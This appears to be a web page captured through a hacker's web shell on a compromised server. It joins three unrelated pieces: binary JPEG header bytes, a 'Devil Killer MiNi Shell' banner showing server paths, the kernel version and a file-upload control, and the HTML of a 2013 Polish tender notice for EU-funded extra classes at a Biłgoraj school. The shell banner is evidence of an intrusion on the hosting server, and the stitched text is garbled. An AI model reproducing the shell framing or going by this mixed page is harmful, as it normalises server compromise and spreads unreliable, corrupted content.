JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130424/163966-N-2013.html

<p class="kh_header"><b>Biłgoraj: Usługi edukacyjne w ramach Projektu pn. Wiedza i umiejętności kluczem do sukcesu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach Priorytetu IX Działania 9.2 Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 163966 - 2013; data zamieszczenia: 24.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Zawodowych i Ogólnokształcących , ul. Przemysłowa 23, 23-400 Biłgoraj, woj. lubelskie, tel. 084 6880775, faks 084 6860450.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zszio.lbl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne w ramach Projektu pn. Wiedza i umiejętności kluczem do sukcesu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach Priorytetu IX Działania 9.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć rozwijających kompetencje zawodowe , matematyczne,  językowe, grafiki komputerowej.
Zamawiający przewidział dziewiętnaście niezależnych części tj: 
Cześć I. 
Przeprowadzenie łącznie 132 godzin lekcyjnych dodatkowych zajęć przygotowujących do matury z matematyki w latach szkolnych 2012/2013 i 2013/2014, które mają na celu wyrównanie dysproporcji, podniesienie kompetencji matematycznych. Zajęcia będą prowadzone w dwóch grupach po 10 osób w wymiarze 66 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 24 godziny zajęć w dwóch grupach po 10 osób. W roku szkolnym 2013/2014 przeprowadzonych będzie 108 godzin zajęć w dwóch grupach po 10 osób. 
Cześć II. 
Przeprowadzenie łącznie 132 godzin lekcyjnych dodatkowych zajęć przygotowujących do matury z matematyki w latach szkolnych 2012/2013 i 2013/2014, które mają na celu wyrównanie dysproporcji, podniesienie kompetencji matematycznych. Zajęcia będą prowadzone w dwóch grupach po 10 osób w wymiarze 66 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 24 godziny zajęć w dwóch grupach po 10 osób. W roku szkolnym 2013/2014 przeprowadzonych będzie 108 godzin zajęć w dwóch grupach po 10 osób. 
Cześć III. 
Przeprowadzenie łącznie 132 godzin lekcyjnych dodatkowych zajęć przygotowujących do matury z matematyki w latach szkolnych 2012/2013 i 2013/2014, które mają na celu wyrównanie dysproporcji, podniesienie kompetencji matematycznych. Zajęcia będą prowadzone w dwóch grupach po 10 osób w wymiarze 66 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 24 godziny zajęć w dwóch grupach po 10 osób. W roku szkolnym 2013/2014 przeprowadzonych będzie 108 godzin zajęć w dwóch grupach po 10 osób. 
Cześć IV. 
Przeprowadzenie łącznie 66 godzin lekcyjnych dodatkowych zajęć przygotowujących do matury z matematyki w latach szkolnych 2012/2013 i 2013/2014, które mają na celu wyrównanie dysproporcji, podniesienie kompetencji matematycznych. Zajęcia będą prowadzone w jednej grupie 10 osobowej w wymiarze 66 godzin. W roku szkolnym 2012/2013 przeprowadzonych będzie 12 godzin zajęć w jednej grupie. W roku szkolnym 2013/2014 przeprowadzonych będzie 54 godziny zajęć w jednej grupie. 
Cześć V. 
Przeprowadzenie łącznie 66 godzin lekcyjnych dodatkowych zajęć przygotowujących do matury z matematyki w latach szkolnych 2012/2013 i 2013/2014, które mają na celu wyrównanie dysproporcji, podniesienie kompetencji matematycznych. Zajęcia będą prowadzone w jednej grupie 10 osobowej w wymiarze 66 godzin. W roku szkolnym 2012/2013 przeprowadzonych będzie 12 godzin zajęć w jednej grupie. W roku szkolnym 2013/2014 przeprowadzonych będzie 54 godziny zajęć w jednej grupie. 

Cześć VI. 
Przeprowadzenie łącznie 66 godzin lekcyjnych dodatkowych zajęć przygotowujących do matury z matematyki w latach szkolnych 2012/2013 i 2013/2014, które mają na celu wyrównanie dysproporcji, podniesienie kompetencji matematycznych. Zajęcia będą prowadzone w jednej grupie 10 osobowej w wymiarze 66 godzin. W roku szkolnym 2012/2013 przeprowadzonych będzie 12 godzin zajęć w jednej grupie. W roku szkolnym 2013/2014 przeprowadzonych będzie 54 godziny zajęć w jednej grupie. 
Cześć VII. 
Przeprowadzenie łącznie 120 godzin lekcyjnych dodatkowych zajęć rozwijających kompetencje gastronomiczno - hotelarskie w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie dodatkowych umiejętności zawodowych umożliwiających wykonywanie praktycznych zadań pracowniczych poprzez kształtowanie nawyków zdobywania wiedzy z zastosowaniem najnowszych osiągnięć techniki. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 120 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 18 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 102 godziny zajęć w jednej grupie 10 osobowej. 
Cześć VIII. 
Przeprowadzenie łącznie 120 godzin lekcyjnych dodatkowych zajęć rozwijających kompetencje gastronomiczno - hotelarskie w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie dodatkowych umiejętności zawodowych umożliwiających wykonywanie praktycznych zadań pracowniczych poprzez kształtowanie nawyków zdobywania wiedzy z zastosowaniem najnowszych osiągnięć techniki. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 120 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 18 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 102 godziny zajęć w jednej grupie 10 osobowej. 
Cześć IX. 
Przeprowadzenie łącznie 120 godzin lekcyjnych dodatkowych zajęć rozwijających kompetencje gastronomiczno - hotelarskie w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie dodatkowych umiejętności umożliwiających wykonywanie praktycznych zadań pracowniczych poprzez kształtowanie nawyków zdobywania wiedzy z zastosowaniem najnowszych osiągnięć techniki. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 120 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 18 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 102 godziny zajęć w jednej grupie 10 osobowej. 
Cześć X. 
Przeprowadzenie łącznie 120 godzin lekcyjnych dodatkowych zajęć rozwijających kompetencje gastronomiczno - hotelarskie w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie dodatkowych umiejętności zawodowych umożliwiających wykonywanie praktycznych zadań pracowniczych poprzez kształtowanie nawyków zdobywania wiedzy z zastosowaniem najnowszych osiągnięć techniki. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 120 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 18 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 102 godziny zajęć w jednej grupie 10 osobowej. 
Cześć XI. 
Przeprowadzenie łącznie 120 godzin lekcyjnych dodatkowych zajęć rozwijających kompetencje gastronomiczno - hotelarskie w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie dodatkowych umiejętności zawodowych umożliwiających wykonywanie praktycznych zadań pracowniczych poprzez kształtowanie nawyków zdobywania wiedzy z zastosowaniem najnowszych osiągnięć techniki. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 120 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 18 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 102 godziny zajęć w jednej grupie 10 osobowej. 
Cześć XII. 
Przeprowadzenie łącznie 120 godzin lekcyjnych dodatkowych zajęć rozwijających kompetencje gastronomiczno - hotelarskie w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie dodatkowych umiejętności zawodowych umożliwiających wykonywanie praktycznych zadań pracowniczych poprzez kształtowanie nawyków zdobywania wiedzy z zastosowaniem najnowszych osiągnięć techniki. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 120 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 18 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 102 godziny zajęć w jednej grupie 10 osobowej. 
Cześć XIII. 
Przeprowadzenie łącznie 120 godzin lekcyjnych dodatkowych zajęć dydaktycznych odzieżowych dla zawodu technik technologii odzieży, w latach szkolnych 2012/2013 i 2013/2014, które mają na celu rozwijanie kompetencji projektowania odzieży z efektami 3D, komputerowego systemu przygotowania i wsparcia produkcji odzieży oraz umożliwienie wykonywania praktycznych zadań pracowniczych. Zajęcia będą prowadzone w grupie 10 osobowej w wymiarze 120 godzin. W roku szkolnym 2012/2013 przeprowadzonych będzie 15 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 105 godzin zajęć w jednej grupie 10 osobowej.
Cześć XIV. 
Przeprowadzenie łącznie 68 godzin lekcyjnych dodatkowych zajęć dydaktycznych mechanicznych dla zawodu technik mechanik w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie umiejętności projektowania procesów obróbki tokarskiej i frezerskiej oraz umożliwienie wykonywania praktycznych zadań pracowniczych. Zajęcia będą prowadzone w jednej grupie 10 osobowej w wymiarze 68 godzin. W roku szkolnym 2012/2013 przeprowadzonych będzie 10 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 58 godzin zajęć w jednej grupie 10 osobowej.
Cześć XV. 
Przeprowadzenie łącznie 68 godzin lekcyjnych dodatkowych zajęć dydaktycznych mechanicznych dla zawodu technik mechanik w latach szkolnych 2012/2013 i 2013/2014, które mają na celu uzyskanie umiejętności projektowania procesów obróbki tokarskiej i frezerskiej oraz umożliwienie wykonywania praktycznych zadań pracowniczych. Zajęcia będą prowadzone w jednej grupie 10 osobowej w wymiarze 68 godzin. W roku szkolnym 2012/2013 przeprowadzonych będzie 10 godzin zajęć w jednej grupie 10 osobowej. W roku szkolnym 2013/2014 przeprowadzonych będzie 58 godzin zajęć w jednej grupie 10 osobowej.
Cześć XVI. 
Przeprowadzenie łącznie 80 godzin lekcyjnych dodatkowych zajęć grafiki komputerowej z modułem przedsiębiorczości w latach szkolnych 2012/2013 i 2013/2014, które mają na celu nabycie nowych praktycznych umiejętności wykorzystywanych w przyszłości w pracy zawodowej przy użyciu najnowszych technologii stosowanych w branży reklamowej. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 80 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 12 godzin zajęć. W roku szkolnym 2013/2014 przeprowadzonych będzie 68 godzin zajęć. 
Cześć XVII. 
Przeprowadzenie łącznie 80 godzin lekcyjnych dodatkowych zajęć grafiki komputerowej z modułem przedsiębiorczości w latach szkolnych 2012/2013 i 2013/2014, które mają na celu nabycie nowych praktycznych umiejętności wykorzystywanych w przyszłości w pracy zawodowej przy użyciu najnowszych technologii stosowanych w branży reklamowej. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 80 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 12 godzin zajęć. W roku szkolnym 2013/2014 przeprowadzonych będzie 68 godzin zajęć. 
Cześć XVIII. 
Przeprowadzenie łącznie 40 godzin lekcyjnych dodatkowych zajęć z języka angielskiego zawodowego w roku szkolnym 2012/2013 i 2013/2014, które mają na celu wykonywanie zadań gramatycznych i leksykalnych niezbędnych do zdania egzaminu zawodowego. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 40 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 6 godzin zajęć. W roku szkolnym 2013/2014 przeprowadzonych będzie 34 godziny zajęć. 
Cześć XIX. 
Przeprowadzenie łącznie 40 godzin lekcyjnych dodatkowych zajęć z języka angielskiego zawodowego w roku szkolnym 2012/2013 i 2013/2014, które mają na celu wykonywanie zadań gramatycznych i leksykalnych niezbędnych do zdania egzaminu zawodowego. Zajęcia będą prowadzone w grupach po 10 osób w wymiarze 40 godzin na grupę. W roku szkolnym 2012/2013 przeprowadzonych będzie 6 godzin zajęć. W roku szkolnym 2013/2014 przeprowadzonych będzie 34 godziny zajęć. 
Szczegółowy opis przedmiotu zamówienia znajduje się w załączeniu do niniejszej SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zamówienia odpowiednio wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia, tj.:
A) minimum 1 osobą (do poszczególnej części), posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie matematyczne (dotyczy części od I do VI) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela matematyki w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,
B) minimum 1 osobą (do poszczególnej części), posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie gastronomiczne lub studia podyplomowe gastronomiczne (dotyczy części od VII do X) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych gastronomicznych w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,
C) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie hotelarskie lub studia podyplomowe z zakresu hotelarstwa (dotyczy części od XI do XII) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych hotelarskich w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,
D) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie odzieżowe, włókiennicze lub studia podyplomowe odzieżowe, włókiennicze (dotyczy części XIII) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych odzieżowych, włókienniczych w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,  
E) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie techniczne (dotyczy części od XIV do XV) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych mechanicznych w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,  
F) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie techniczne (dotyczy części od XVI do XVII) oraz co najmniej dwuletni staż pracy w szkole ponadgimnazjalnej zawodowej na stanowisku nauczyciela przedmiotów zawodowych w zawodzie technik obsługi turystycznej lub organizacji reklamy ze znajomością technologii ICT, stopień awansu zawodowego  nauczyciela min. mianowany, 
G) minimum 1 osobą posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie 
w zakresie języka angielskiego lub studia podyplomowe z języka angielskiego (dotyczy części od XVIII do XIX) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela języka angielskiego zawodowego 
w szkole ponadgimnazjalnej, stopień awansu zawodowego nauczyciela minimum mianowany. 
Do sporządzenia wykazu można wykorzystać załączony do SIWZ wzór zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zamówienia odpowiednio wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia, tj.:
A) minimum 1 osobą (do poszczególnej części), posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie matematyczne (dotyczy części od I do VI) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela matematyki w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,
B) minimum 1 osobą (do poszczególnej części), posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie gastronomiczne lub studia podyplomowe gastronomiczne (dotyczy części od VII do X) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych gastronomicznych w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,
C) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie hotelarskie lub studia podyplomowe z zakresu hotelarstwa (dotyczy części od XI do XII) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych hotelarskich w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,
D) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie odzieżowe, włókiennicze lub studia podyplomowe odzieżowe, włókiennicze (dotyczy części XIII) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych odzieżowych, włókienniczych w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,  
E) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie techniczne (dotyczy części od XIV do XV) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela przedmiotów zawodowych mechanicznych w szkole ponadgimnazjalnej, stopień awansu zawodowego  nauczyciela minimum mianowany,  
F) minimum 1 osobą, posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie techniczne (dotyczy części od XVI do XVII) oraz co najmniej dwuletni staż pracy w szkole ponadgimnazjalnej zawodowej na stanowisku nauczyciela przedmiotów zawodowych w zawodzie technik obsługi turystycznej lub organizacji reklamy ze znajomością technologii ICT, stopień awansu zawodowego  nauczyciela min. mianowany, 
G) minimum 1 osobą posiadającą uprawnienia pedagogiczne, wykształcenie wyższe magisterskie 
w zakresie języka angielskiego lub studia podyplomowe z języka angielskiego (dotyczy części od XVIII do XIX) oraz co najmniej dwuletni staż pracy na stanowisku nauczyciela języka angielskiego zawodowego 
w szkole ponadgimnazjalnej, stopień awansu zawodowego nauczyciela minimum mianowany. 
Do sporządzenia wykazu można wykorzystać załączony do SIWZ wzór zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane przez Zamawiającego, jakie Wykonawcy muszą złożyć w ofercie:
1. Wypełniony druk Formularza Ofertowego - zał. nr 1 do niniejszej specyfikacji;
2. Podpisany przez wykonawcę szczegółowy opis przedmiotu zamówienia( danej części na którą składana jest oferta)
3. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacja o tym, że wykonawca nie należy do grupy kapitałowej (załącznik nr 6 do SIWZ) - oryginał lub kopia poświadczona notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zszio.lbl.pl - zamówienia publiczne<br>
